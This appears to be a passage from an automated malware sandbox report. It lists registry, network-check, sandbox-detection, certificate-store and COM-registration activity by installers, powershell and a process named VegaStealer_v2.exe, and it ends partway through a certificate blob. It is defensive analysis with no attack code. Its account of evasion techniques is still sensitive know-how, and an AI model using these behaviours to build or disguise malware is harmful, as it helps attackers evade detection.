\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language assistant_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Razer Axon_240662296.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VegaStealer_v2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Assistant_114.0.5282.21_Setup.exe_sfx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AxonManifestRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CheatEngine75.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Razer Axon_240662296.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OperaSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RazerComponentsController.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeWebview2Setup.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5172 MicrosoftEdgeUpdate.exe 1448 MicrosoftEdgeUpdate.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 v2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier v2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CheatEngine75.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ CheatEngine75.tmp -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4688 WMIC.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS RazerCentralService.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS RazerCentralService.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA RazerCentralService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs RazerCentralService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople RazerCentralService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates ServiceHost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" RazerCentralService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates RazerCentralService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates RazerCentralService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" RazerCentralService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs RazerCentralService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs RazerCentralService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs RazerCentralService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs RazerCentralService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdgeUpdate.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.ProcessLauncher.1.0\ = "Microsoft Edge Update Process Launcher Class" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CredentialDialogMachine.1.0\CLSID\ = "{5F6A18BB-6231-424B-8242-19E5BB94F8ED}" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\ProxyStubClsid32\ = "{83BF6728-A96E-4228-B442-DB539208D56E}" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD} MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\ProxyStubClsid32\ = "{83BF6728-A96E-4228-B442-DB539208D56E}" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ = "ICoCreateAsync" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\NumMethods\ = "10" MicrosoftEdgeUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{9F3F5F5D-721A-4B19-9B5D-69F664C1A591}\PROGID MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\ProxyStubClsid32\ = "{83BF6728-A96E-4228-B442-DB539208D56E}" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8D191696-9CAC-4E4F-8EBC-2C7A8910C5B6}\InprocHandler32 MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\DefaultIcon CheatEngine75.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ProxyStubClsid32 MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\NumMethods MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ProxyStubClsid32\ = "{83BF6728-A96E-4228-B442-DB539208D56E}" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\ProxyStubClsid32\ = "{83BF6728-A96E-4228-B442-DB539208D56E}" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}\ = "IJobObserver2" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods\ = "4" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.ProcessLauncher\CLSID\ = "{08D832B9-D2FD-481F-98CF-904D00DF63CC}" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\VersionIndependentProgID\ = "MicrosoftEdgeUpdate.Update3COMClassService" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9F3F5F5D-721A-4B19-9B5D-69F664C1A591} MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{08D832B9-D2FD-481F-98CF-904D00DF63CC}\ProgID MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E} MicrosoftEdgeUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{83BF6728-A96E-4228-B442-DB539208D56E}\InProcServer32\ThreadingModel = "Both" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\NumMethods\ = "12" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\NumMethods\ = "5" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\ProxyStubClsid32\ = "{83BF6728-A96E-4228-B442-DB539208D56E}" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\ProgID\ = "MicrosoftEdgeUpdate.Update3COMClassService.1.0" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8D191696-9CAC-4E4F-8EBC-2C7A8910C5B6}\InprocHandler32\ThreadingModel = "Both" MicrosoftEdgeUpdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8D191696-9CAC-4E4F-8EBC-2C7A8910C5B6}\InprocHandler32 MicrosoftEdgeUpdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\VERSIONINDEPENDENTPROGID MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{83BF6728-A96E-4228-B442-DB539208D56E}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.167.21\\psmachine_64.dll" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachineFallback\ = "Google Update Policy Status Class" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\ = "IPackage" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\NumMethods\ = "4" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods\ = "4" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26} MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\NumMethods\ = "24" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE} MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\NumMethods\ = "16" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebMachineFallback.1.0\CLSID\ = "{E421557C-0628-43FB-BF2B-7C9F8A4D067C}" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\ = "IBrowserHttpRequest2" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\NumMethods MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}\NumMethods\ = "4" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\ = "ICoCreateAsyncStatus" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ProxyStubClsid32\ = "{83BF6728-A96E-4228-B442-DB539208D56E}" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB} MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\ProxyStubClsid32\ = "{83BF6728-A96E-4228-B442-DB539208D56E}" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84}\NumMethods\ = "4" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}\NumMethods\ = "9" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\Elevation MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\ = "IPolicyStatusValue" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB} MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.167.21\\MicrosoftEdgeUpdateBroker.exe\"" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\NumMethods\ = "24" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\NumMethods\ = "5" MicrosoftEdgeUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{5F6A18BB-6231-424B-8242-19E5BB94F8ED}\VERSIONINDEPENDENTPROGID MicrosoftEdgeUpdate.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 saBSI.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 5c0000000100000004000000001000001900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c040000000100000010000000e94fb54871208c00df70f708ac47085b200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 saBSI.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e633119301706035504